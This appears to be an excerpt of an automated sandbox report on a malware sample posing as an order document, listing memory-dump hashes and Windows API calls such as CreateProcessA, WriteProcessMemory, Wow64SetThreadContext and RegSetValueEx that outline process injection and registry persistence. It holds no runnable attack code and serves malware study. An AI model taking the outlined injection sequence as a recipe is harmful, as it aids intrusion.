                                          • Opcode Fuzzy Hash: e6fbe1b6448a712bbc1b1bbe15b77c8a7ff5d775f2103e599d946765412a8af0
                                          • Instruction Fuzzy Hash: C0C13A74E01218DFEB94CFA9D948BADBBF2FF49305F1480A9D449AB241EB745984CF02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PH^q
                                          • API String ID: 0-2549759414
                                          • Opcode ID: b29d9a54530b72a3f93f07bfb14c75bbf8e1d4d32cb3f554eea73b4724c60152
                                          • Instruction ID: 1a2983bca54952e66174f7fb9438a580572db1bfeec7d5f8dc8d65ef814f1eaf
                                          • Opcode Fuzzy Hash: b29d9a54530b72a3f93f07bfb14c75bbf8e1d4d32cb3f554eea73b4724c60152
                                          • Instruction Fuzzy Hash: 36C13974E01218CFEBA4CFA9D948BADBBF2FF45301F1480A9D449AB251EB745985CF02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: 805c515e170498f0c1ce52311b6f4fafcb22b13b1255180508802800b207075d
                                          • Instruction ID: 4594ca7b13832390ae81254e608cd2d2ed51ee90d5746993e5515b7851915cc3
                                          • Opcode Fuzzy Hash: 805c515e170498f0c1ce52311b6f4fafcb22b13b1255180508802800b207075d
                                          • Instruction Fuzzy Hash: 9BA1E774E05618CFDF94CFA9D984BADBBB2FF89304F20906AD40AA7241DB345985CF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 974a0ac743ab866d5a950a6cf1adc9ba9eb64e5d0354ff401491f74c2a2c9074
                                          • Instruction ID: 376177e9f56ff9b95eb8c440d48992653a0e2f2798d0125c109660c77284cd56
                                          • Opcode Fuzzy Hash: 974a0ac743ab866d5a950a6cf1adc9ba9eb64e5d0354ff401491f74c2a2c9074
                                          • Instruction Fuzzy Hash: AA329574A0422A8FCBA5DF28C994BA9B7B6FF48301F1481E9D54DA7351DB30AE81CF54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 0192CABE
                                          • GetCurrentThread.KERNEL32 ref: 0192CAFB
                                          • GetCurrentProcess.KERNEL32 ref: 0192CB38
                                          • GetCurrentThreadId.KERNEL32 ref: 0192CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: c5dffaf94a283575ea5e9b7ec279dbae6d3d6437f71f7af162eeb4b9b8639950
                                          • Instruction ID: 8c85ebcc76e937e23368b95311bbdcc2ecd2f0e64371fdbdefb9ba729cbc05fa
                                          • Opcode Fuzzy Hash: c5dffaf94a283575ea5e9b7ec279dbae6d3d6437f71f7af162eeb4b9b8639950
                                          • Instruction Fuzzy Hash: A95186B09013498FDB18DFAAD848B9EFFF1EF89315F248459E009A72A0D7749984CF65

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 0192CABE
                                          • GetCurrentThread.KERNEL32 ref: 0192CAFB
                                          • GetCurrentProcess.KERNEL32 ref: 0192CB38
                                          • GetCurrentThreadId.KERNEL32 ref: 0192CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: ab5c3b9ed89ddaa143d75f5a938745be2080cf2095bcf08bd729f434d685a969
                                          • Instruction ID: 0e726a5cd0d250496d4de66a1eb814ea9575c03ed756be8b7f3a820f21020804
                                          • Opcode Fuzzy Hash: ab5c3b9ed89ddaa143d75f5a938745be2080cf2095bcf08bd729f434d685a969
                                          • Instruction Fuzzy Hash: 6B5174B09013098FDB18DFAAD448B9EBBF1EF89315F208419E019A7290DB745984CF65

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q$4'^q
                                          • API String ID: 0-1196845430
                                          • Opcode ID: a135adc93e45800ae19093695ce4e4867ddcdae5127abdc3a01b8b0cf6007235
                                          • Instruction ID: a4776f3cca85e053d2d72b78c73dc37f1a031c534cb5bf2e2fb095b1eb4c9ee3
                                          • Opcode Fuzzy Hash: a135adc93e45800ae19093695ce4e4867ddcdae5127abdc3a01b8b0cf6007235
                                          • Instruction Fuzzy Hash: D6F1FD34A00218DFCB54DFA4D998A9DBBB2FF89301F158558E906AB365DB70EC42CF90

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$C$q
                                          • API String ID: 0-2527442695
                                          • Opcode ID: 04930699e22cd9b0cf402d49ee1ddad57bd59f226e5c132827e19461d9b70b3a
                                          • Instruction ID: fdc485a6b50e2fac33b9f3e96cba6a07705f40d969fb399c32ccdb4d1c6906f2
                                          • Opcode Fuzzy Hash: 04930699e22cd9b0cf402d49ee1ddad57bd59f226e5c132827e19461d9b70b3a
                                          • Instruction Fuzzy Hash: 05010470C06218CFEFA0CF64C849BDDBBB0EB0A314F245199C40972290CB748AC4CF65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1734499959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: 5b8d687567f4c005be25895a1666c3bf18e3d3e5a452f7e78972a7c21c63560d
                                          • Instruction ID: fd0123687a6dc563f9e2e0e35a805672b8de9c0977cb0c79e21e362633631bd5
                                          • Opcode Fuzzy Hash: 5b8d687567f4c005be25895a1666c3bf18e3d3e5a452f7e78972a7c21c63560d
                                          • Instruction Fuzzy Hash: 77420974E04219DFDF94DF99E8486ADBBB2FF88301F108015DA16AB754CB749982CF91

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $^q$$^q
                                          • API String ID: 0-355816377
                                          • Opcode ID: 580bf814fd41094e5092aab26714790f5e556ac8295efd71d1ec0697aca20239
                                          • Instruction ID: e805b75ce0558d723fb4ab7f4a6059d262b129cf9087a5a1d79ee7a133bb7a33
                                          • Opcode Fuzzy Hash: 580bf814fd41094e5092aab26714790f5e556ac8295efd71d1ec0697aca20239
                                          • Instruction Fuzzy Hash: 77123A31E00259CFDB55DFA4D894ABDBBB6FF48780F148019E812AB395DB389D46CB90

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1734499959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: e813dace590621d4e8b5e906b1471c3d2e9657b967288effeebca1cf96cdb304
                                          • Instruction ID: 8c65877e88d7d5eb69416399c8133062620bd14edfb744af586865ee50f1d017
                                          • Opcode Fuzzy Hash: e813dace590621d4e8b5e906b1471c3d2e9657b967288effeebca1cf96cdb304
                                          • Instruction Fuzzy Hash: 9EF1E534D01308EFDB94DFA9E8946ACBBB2FF49315F204129EA16AB350DB706985CF41

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1734499959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q$4'^q
                                          • API String ID: 0-2697143702
                                          • Opcode ID: 298e2037683862e1d3235cf26ca745ac42adb4d12625f407416f77ba171ebe44
                                          • Instruction ID: 1f1d42f4dff2163d8968daaeb76b5e824ade2d80e814f73fa6cec0e8bb1180be
                                          • Opcode Fuzzy Hash: 298e2037683862e1d3235cf26ca745ac42adb4d12625f407416f77ba171ebe44
                                          • Instruction Fuzzy Hash: 7BA1E574E0021DEFDB44DFA5E8586ADBBB2FF88302F14842ADA12AB350CB755941CF91

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq$Hbq
                                          • API String ID: 0-4081012451
                                          • Opcode ID: 0a612940b2c57b20122f096ff6462f2021b37a5358209d5b88c9294fd29828bb
                                          • Instruction ID: 6f46d2f25c4381496e43923f642a10086aa6a3d7e512c68a5b063d340ba78de0
                                          • Opcode Fuzzy Hash: 0a612940b2c57b20122f096ff6462f2021b37a5358209d5b88c9294fd29828bb
                                          • Instruction Fuzzy Hash: D3518C34B002158FCB99AB38C86462EBBB3AFD9346B54446CD9069B7A0DF35DD02CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$<
                                          • API String ID: 0-103380429
                                          • Opcode ID: 3553670792c55683db76449cea653d5ef990bef742642034efa4094c3736e0b0
                                          • Instruction ID: 09fe0bb84707f039071b9ddd39315e62c55d419cba17f77bba10230a174d950a
                                          • Opcode Fuzzy Hash: 3553670792c55683db76449cea653d5ef990bef742642034efa4094c3736e0b0
                                          • Instruction Fuzzy Hash: 5051E274D01258CFEBA0DF58D888BD9BBB1AB45305F0094EAC10EBB650CB745AC9CF25
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5$h
                                          • API String ID: 0-1868625573
                                          • Opcode ID: 246934c35599c349d2769eeaee0fd687ebef6a6bbf7e65a290b9851b2d7547f2
                                          • Instruction ID: c8ece18f6e7c2b48a148adefd3656af9295ad4f53df0731ffddf3d4bc584f8d7
                                          • Opcode Fuzzy Hash: 246934c35599c349d2769eeaee0fd687ebef6a6bbf7e65a290b9851b2d7547f2
                                          • Instruction Fuzzy Hash: CB21E9B4A44618CFCBA4DF28D8987A9BBB1BB48341F5041E9D64EE7390DB305E84CF45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$C
                                          • API String ID: 0-3331529056
                                          • Opcode ID: aa0cbc533168d0c0b35dfa819b0bfd52325bc85be36eeead6c80c741c954d472
                                          • Instruction ID: 7571f9cb6070c87f7b49223561e2a573219ba33d60790939ebb853c4dd091967
                                          • Opcode Fuzzy Hash: aa0cbc533168d0c0b35dfa819b0bfd52325bc85be36eeead6c80c741c954d472
                                          • Instruction Fuzzy Hash: 82F0AF70902229CFEFA0CF64C888B8DBBB1FB09315F2485E9C409B2250C7749AC1CF65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq
                                          • API String ID: 0-2474004448
                                          • Opcode ID: edb81795a80583db3deefa6c82c2fcaa693ca2a274d3b25b6f33e85271c2de76
                                          • Instruction ID: f64428c993514122cb3b401843fc14de0a06a43d4fb1bbf16b25ad699ab88a22
                                          • Opcode Fuzzy Hash: edb81795a80583db3deefa6c82c2fcaa693ca2a274d3b25b6f33e85271c2de76
                                          • Instruction Fuzzy Hash: CC52F875A002289FDB64DF69C990BADBBF2BB88301F1541D9E509EB351DA309E81CF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (_^q
                                          • API String ID: 0-538443824
                                          • Opcode ID: 68c0c8bc6b30b113743f347a6d4301fa48f5cd45f6256e87a1a32ab7a2edfc5b
                                          • Instruction ID: 8fbe97eaf546ad330b524b378047fd3a7b3373aa23d73260279b316e456f2c22
                                          • Opcode Fuzzy Hash: 68c0c8bc6b30b113743f347a6d4301fa48f5cd45f6256e87a1a32ab7a2edfc5b
                                          • Instruction Fuzzy Hash: AB226935A002089FDB44DFA8D894A6DB7F2BF88340F558469E905EF3A5CB71ED41CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Pl^q
                                          • API String ID: 0-2831078282
                                          • Opcode ID: 13732b9e2af2b93709a3bd820cdc3b4f81123a8d330d1e395e8f1a3946ac5112
                                          • Instruction ID: 9f37b7c8f77bae5d457832cffda3ad25aaa8de28dfb79a97e75bab5977900458
                                          • Opcode Fuzzy Hash: 13732b9e2af2b93709a3bd820cdc3b4f81123a8d330d1e395e8f1a3946ac5112
                                          • Instruction Fuzzy Hash: 5D51F274B002098FDB44DF28C894A6A7BE6BF89740F1540A5E905DF3B5DB70ED41CB91
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06EE2D2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6023d2b917dfa75c710875ed600ae1456a503172bcae908014917a7f639d05c5
                                          • Instruction ID: 50ad430690c9864e44dc9b3a389a013dcc6c567ff5f5078b688cc744d0bf209d
                                          • Opcode Fuzzy Hash: 6023d2b917dfa75c710875ed600ae1456a503172bcae908014917a7f639d05c5
                                          • Instruction Fuzzy Hash: 86814571E007198FDB50CFA9C8817AEBBF6BF48314F148529E959EB284DB749981CF81
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06EE2D2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 3121fa1cadbe03fcd1bac14393323c5abd86b16d55f2f0ae9afd59c26c957ea2
                                          • Instruction ID: 1bce7a8bedd0e132d58f1e70387276d728c3f4a1f7c52f91c6841d8ec0dd625f
                                          • Opcode Fuzzy Hash: 3121fa1cadbe03fcd1bac14393323c5abd86b16d55f2f0ae9afd59c26c957ea2
                                          • Instruction Fuzzy Hash: 53813571E007198FDB50CFA9C8817AEBBF6BF48314F148529E959EB284DB749981CF81
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0192AA06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 59f0d0290f5d84a35bc0303710939e68736d9e98485a9bcece63119b0375e9f2
                                          • Instruction ID: 0a2783f3b38beaec8adb2ccb270a6c02d43032d5b1d13e2494a8aee3d392bb6d
                                          • Opcode Fuzzy Hash: 59f0d0290f5d84a35bc0303710939e68736d9e98485a9bcece63119b0375e9f2
                                          • Instruction Fuzzy Hash: 368175B1A00B158FD724DF2AD44475ABBF5FF88304F00892DD58AD7A44DB74E94ACB91
                                          APIs
                                          • CopyFileA.KERNEL32(?,?,?), ref: 06EE4B45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          • Opcode ID: 1882db755d5fa78f8bdc551a56ddf68bcf2b8a6d248e8e0a76473f3ed3ba3865
                                          • Instruction ID: 439325e3d9b82268f81c833880f2b33316d57385915e80a51071b065c25bf884
                                          • Opcode Fuzzy Hash: 1882db755d5fa78f8bdc551a56ddf68bcf2b8a6d248e8e0a76473f3ed3ba3865
                                          • Instruction Fuzzy Hash: 22518971D00769CFDB50DFA9C8857AEBBF1EF48324F148529E819E7284EB749881CB81
                                          APIs
                                          • CopyFileA.KERNEL32(?,?,?), ref: 06EE4B45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          • Opcode ID: 956224c750bc9b2aaa24eb9b225d7f636765c8ae9a73a7a6dc0995c11762ea72
                                          • Instruction ID: a248bb14d2cd21919fbd773d21bd4bf2fc7d0a63b2f52cd5b11734921479c5ea
                                          • Opcode Fuzzy Hash: 956224c750bc9b2aaa24eb9b225d7f636765c8ae9a73a7a6dc0995c11762ea72
                                          • Instruction Fuzzy Hash: 1F514971D00759CFDB50DFA9C8857AEBBF2EF48324F148629D859E7284EB749881CB81
                                          APIs
                                          • RegSetValueExA.KERNEL32(?,?,?,?,00000000,?), ref: 06EE4F12
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Value
                                          • String ID:
                                          • API String ID: 3702945584-0
                                          • Opcode ID: 022722f06889ad34688729afcbf696c498173c0a4b2bc00426b2cb1020cdfe55
                                          • Instruction ID: e952150e50d314957c7ea066170f6b49e02aebb095c54b6627630efc787041dd
                                          • Opcode Fuzzy Hash: 022722f06889ad34688729afcbf696c498173c0a4b2bc00426b2cb1020cdfe55
                                          • Instruction Fuzzy Hash: FD4165B1D00718DFCB50CFA9C88569EBBF1FF48714F10942AE819AB280DB389845CB91
                                          APIs
                                          • RegSetValueExA.KERNEL32(?,?,?,?,00000000,?), ref: 06EE4F12
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Value
                                          • String ID:
                                          • API String ID: 3702945584-0
                                          • Opcode ID: de1d418a35f03f47e8090bc6657ec9181d07a37cb31a9cefa85590ef59ba984a
                                          • Instruction ID: e1bb008ca9c34213a0dcbe044a8949069434d45b89c4b6962b350c041c90dd84
                                          • Opcode Fuzzy Hash: de1d418a35f03f47e8090bc6657ec9181d07a37cb31a9cefa85590ef59ba984a
                                          • Instruction Fuzzy Hash: E24174B1D00718CFCB60CFA9C88579EBBF1FF48714F10902AE819AB290DB789845CB91
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06EE4D33
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 8e8d224dfba7395aedb51c3d7a2cec2e9bc2db33c7006bab0bfd2b636acc3af7
                                          • Instruction ID: 1d01c8d109987e6bded50f2a0b54682a21222a21d93976f05fde3dcfade2f2cf
                                          • Opcode Fuzzy Hash: 8e8d224dfba7395aedb51c3d7a2cec2e9bc2db33c7006bab0bfd2b636acc3af7
                                          • Instruction Fuzzy Hash: B64162B1E00318DFDB10DFA9C885B9EBBF1BF48314F14852AE818AB280DB749845CF91
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06EE4D33
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: fd66fd4bd14c30498dccae1a4b6b8361fe4967f16539f443fac310b8ed29b648
                                          • Instruction ID: 9a6bbbdb51f4501bd30dc0ee320ba2ccb88b03ffec19cb6f59ecab06f69445a4
                                          • Opcode Fuzzy Hash: fd66fd4bd14c30498dccae1a4b6b8361fe4967f16539f443fac310b8ed29b648
                                          • Instruction Fuzzy Hash: A74144B0D00318DFDB10DFA9C885B9EBBF1BF48314F14852AE819AB280DB749845CF91
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06EE3400
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 3b8ebd1778877ca9436847a83b05985463b5868fc3bdaed52867cbdac2d9dffb
                                          • Instruction ID: 985ec5c55949c20b0d8e511137c4caa4d46dc46699f67946dbab41e454f341e7
                                          • Opcode Fuzzy Hash: 3b8ebd1778877ca9436847a83b05985463b5868fc3bdaed52867cbdac2d9dffb
                                          • Instruction Fuzzy Hash: D12148B19003099FCB10DFA9C885BDEBBF5FF48320F10842AE959A7241C7799945DFA4
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06EE3400
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: b852921d7fb2fee76eb7003e9efe9e2cdef0faede2f270beef9b3bbbdade3375
                                          • Instruction ID: 0b4d6716113ec086c49463e307e7e0449f3a16a8492592be8a4140b0931a3077
                                          • Opcode Fuzzy Hash: b852921d7fb2fee76eb7003e9efe9e2cdef0faede2f270beef9b3bbbdade3375
                                          • Instruction Fuzzy Hash: 7E2139B1D003499FCB10DFAAC885BDEBBF5FF48310F10842AE919A7241D7789955CBA4
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EE2ECE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 9b7b7fa92d709c5b3638d047c8615716981c7df0b714b725fad2f9e2e2dce49e
                                          • Instruction ID: 02c8332cdeac3a5be232f0932c69ee63561ba2d505bdb52a52d6b3a59c5acc5a
                                          • Opcode Fuzzy Hash: 9b7b7fa92d709c5b3638d047c8615716981c7df0b714b725fad2f9e2e2dce49e
                                          • Instruction Fuzzy Hash: FB2148B19003088FCB10DFAAC4857EEBFF4AB88324F14842AD519A7241CB789A44CBA5
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EE37D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 47f2ddcff61922de42c6b19f49f94e6ceb391524b61f48f690fa9e02510c9eb6
                                          • Instruction ID: 234fdd514e1bf86b7dd1326dc35d581d920078c30fa31b8e807d80476d175d62
                                          • Opcode Fuzzy Hash: 47f2ddcff61922de42c6b19f49f94e6ceb391524b61f48f690fa9e02510c9eb6
                                          • Instruction Fuzzy Hash: 1F2128B19043499FDB10DFAAC445AAFFBF4EF48320F10842DD459A7240DB7995458BA5
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0192D117
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 40d3fd8e17dae8b06733902b8dde6dd90045c48ba1d8c2805c4778c14f7251a7
